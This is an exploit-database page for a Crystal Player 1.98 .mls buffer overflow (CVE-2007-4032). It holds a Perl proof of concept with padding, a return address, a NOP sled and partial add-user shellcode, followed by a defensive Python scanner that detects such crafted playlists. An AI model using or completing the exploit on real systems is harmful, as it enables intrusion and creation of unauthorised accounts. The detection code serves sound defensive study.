CrystalPlayer 1.98 - '.mls' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-4032  
Publish Date: 26 Jul 2007

#Crystal Player 1.98
#Playlist(.mls) File Local Buffer Overflow Exploit
#Credit To Timq For The Vulnerability
#POC By Arham Muhammad

#While Debugging, EIP And EBP Successfully Get Overwritten!
#Upon Successful Exploitation, DoS Occurs And It Further Destroys The Libraries;
#When The App Is Executed The Next Time
#It Throws A Microsoft Visual C++ Runtime Library Error Followed By Another Exception
#The POC Adds User "root" With Password "root" To The OS!
#Tested On x86 Vista Enterprise Ed.
#Might Require Changing The ESP Address Because Of OS And SP Changes

use strict;
use warnings;

print "Crystal Player 1.98 Local Buffer Overflow Exploit\n";
print "Creating Crafted .mls File\n";

# The output file name is missing from this listing; './crafted.mls' is an assumed placeholder.
my $outfile = './crafted.mls';

my $buff = 'A' x 1033;            # padding up to the saved return address

my $ret = "\x76\xF5\x48\x37";     # call esp in ntdll.dll (x86 Vista Enterprise)

# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub
# Add user root with pass root, 232 bytes. Only the first 16 bytes survive in this
# listing; the remainder of the payload is truncated here.
my $shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xea";

my $nopsled = "\x90" x 797;       # NOP sled to fill the buffer

open(my $mls, '>', $outfile) or die "Cannot open $outfile: $!\n";
binmode($mls);                    # raw bytes, no CRLF translation on Windows
print $mls $buff;
print $mls $ret;
print $mls $nopsled;
print $mls $shellcode;
close($mls);

print "Crafted File Created!\n";

#Arham Muhammad

#Greets:: str0ke, Hackman, tushy, And All My Friends, Especially AmBi (Love Ya!!!);

# [2007-07-26]
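As an added defensive example (not part of the original PoC, and not CrystalPlayer code): a small Python scanner that flags .mls playlist files showing the layout used above, that is, a single entry at or past the 1033-byte overflow point, a long run of 0x90 bytes, or raw non-printable bytes where a text playlist should only hold file paths. The two sample playlists in the block are constructed; the NOP_RUN_MIN threshold and the printable-ASCII rule are the example's own assumptions, and the crafted sample uses 0xCC filler in place of any real payload.

```python
import re

# From the PoC above: 1033 bytes of padding reach the saved return address, so any
# single playlist entry at or beyond that length cannot be an ordinary file path.
MAX_ENTRY_LEN = 1033
# Assumed threshold: a run of this many 0x90 bytes inside a text playlist is a NOP sled.
NOP_RUN_MIN = 32


def _non_printable_count(line: bytes) -> int:
    """Count bytes outside printable ASCII (tab allowed); a playlist should hold only paths."""
    return sum(1 for b in line if (b < 0x20 and b != 0x09) or b >= 0x7F)


def scan_mls(data: bytes) -> list:
    """Return a list of (line_no, reason) findings for a .mls blob; an empty list means clean."""
    findings = []
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if len(line) >= MAX_ENTRY_LEN:
            findings.append((line_no, f"entry length {len(line)} >= {MAX_ENTRY_LEN}"))
        sled = re.search(rb"\x90{%d,}" % NOP_RUN_MIN, line)
        if sled:
            findings.append((line_no, f"NOP sled of {len(sled.group(0))} bytes"))
        bad = _non_printable_count(line)
        if bad:
            findings.append((line_no, f"{bad} non-printable bytes"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if any check fired; intended as a pre-open gate or a mail/web gateway filter."""
    return bool(scan_mls(data))


# Constructed samples (not files from the original page).
BENIGN_MLS = b"C:\\Music\\track01.mp3\r\nC:\\Music\\track02.mp3\r\n"
# Mirrors the PoC layout: padding, 4-byte return address, NOP sled, then 0xCC bytes
# standing in for the payload (no real shellcode is included).
CRAFTED_MLS = b"A" * 1033 + b"\x76\xF5\x48\x37" + b"\x90" * 797 + b"\xCC" * 16

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_MLS), ("crafted", CRAFTED_MLS)):
        print(name, "->", scan_mls(blob) or "clean")
```

The length check alone catches this PoC, since it writes the whole file as one entry; the sled and non-printable checks are there so that a variant with shorter padding still stands out in a text format that should never contain either.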